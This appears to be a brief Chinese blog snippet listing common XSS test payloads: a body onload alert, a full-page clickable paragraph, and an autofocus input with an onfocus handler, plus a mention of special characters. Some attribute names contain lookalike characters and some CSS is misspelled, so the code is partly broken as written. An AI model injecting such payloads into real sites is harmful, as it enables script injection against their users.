xss常见攻击代码有:
1.加载完毕自动触发事件:
<body οnlοad="alert('xss')"></body>
2.使html某元素撑满整个页面:
<p οnclick="alert('1')" style="postion:fixed;width:100%;heith:100%"> </p>
3.增加属性触发事件:
<input οnfοcus="alert('1')" autofocus/>
4.特殊字符' 、" 、( 、)等等。
支付宝扫一扫
微信扫一扫
.png)
.png)